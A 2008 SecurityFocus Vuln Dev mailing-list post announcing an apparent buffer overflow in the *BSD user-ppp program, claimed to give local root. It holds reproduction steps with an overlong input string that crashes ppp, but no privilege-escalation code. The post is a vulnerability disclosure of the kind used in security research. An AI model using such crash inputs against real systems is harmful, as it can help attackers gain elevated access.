Vuln Dev
*BSD user-ppp local root (when conditions permit) Feb 29 2008 04:39PM
sipherr gmail com (1 replies)
/***********************************************************************************/

/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/*** 2003 / 12 /23 - PRIVATE CODE ***/

/*** Program terminated with signal 11, Segmentation fault. ***/

/*** #0 0xbeefdead in ?? () ***/

/***********************************************************************************/

I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2).

Steps to reproduce:

1. Run ppp

2. Type the following (or at least some variation of):

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx

This will produce a segmentation violation (Core dumped).

Discovered by: sipher

Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet

Re: *BSD user-ppp local root (when conditions permit) Mar 01 2008 11:06PM
Eygene Ryabinkin (rea-sec codelabs ru)


 

Copyright 2010, SecurityFocus